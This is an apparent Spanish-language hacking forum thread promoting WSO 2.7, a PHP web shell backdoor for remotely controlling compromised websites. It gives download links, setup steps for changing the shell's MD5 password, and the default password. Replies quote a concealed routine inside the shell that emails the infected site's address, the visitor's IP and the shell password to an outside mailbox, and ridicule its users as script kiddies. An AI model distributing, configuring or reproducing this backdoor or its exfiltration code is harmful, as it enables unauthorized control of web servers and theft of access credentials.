WSO es una php shell backdoor que proporciona una interfaz para distintas operaciones remotas, ahora en su version 2.7 con nuevas herramientas y un vistoso cambio en imagen.
(http://craven.cu.cc/wp-content/uploads/2013/05/ws0in.png)
con pass simple http://pastebin.com/PMWsW873 (http://pastebin.com/PMWsW873)
pass con error 404 http://pastebin.com/00pLDehv (http://pastebin.com/00pLDehv)
importante cambiar la contraseña de la shell***
1. Abriremos nuestra shell en un editor de texto plano (yo les recomiendo notepad)
2. buscaremos
$auth_pass = "1846c8d1ead7d12e9f4d18db001ff079″;
lo remplazaremos por nuestra contraseña en MD5 y guardamos
ya que si no quieren cambiar la pass.
la contraseña por defecto es:
hackmeDON
Hay que enseñarles a ofuscar código a estos juakerz
$visitc = $_COOKIE["visits"];
if ($visitc == "") {
$visitc = 0;
$visitor = $_SERVER["REMOTE_ADDR"];
$web = $_SERVER["HTTP_HOST"];
$inj = $_SERVER["REQUEST_URI"];
$target = rawurldecode($web.$inj);
$judul = "WSO 2.7 http://$target by $visitor";
$body = "Bug: $target by $visitor - $auth_pass";
if (!empty($web)) { @mail("[email protected]",$judul,$body,$auth_pass); }
}
else { $visitc++; }
@setcookie("visitz",$visitc);
You are not allowed to view links.
You are not allowed to view links.
Register or Login or You are not allowed to view links.
Register or Login
Hay que enseñarles a ofuscar código a estos juakerz
$visitc = $_COOKIE["visits"];
if ($visitc == "") {
$visitc = 0;
$visitor = $_SERVER["REMOTE_ADDR"];
$web = $_SERVER["HTTP_HOST"];
$inj = $_SERVER["REQUEST_URI"];
$target = rawurldecode($web.$inj);
$judul = "WSO 2.7 http://$target by $visitor";
$body = "Bug: $target by $visitor - $auth_pass";
if (!empty($web)) { @mail("[email protected]",$judul,$body,$auth_pass); }
}
else { $visitc++; }
@setcookie("visitz",$visitc);
este es un descarado...... ---->
[email protected] ;D ;D ;D ;D ;D
eso pasa por ocupar herramientas de otros o lo que es lo mismo ser un simple kiddie xD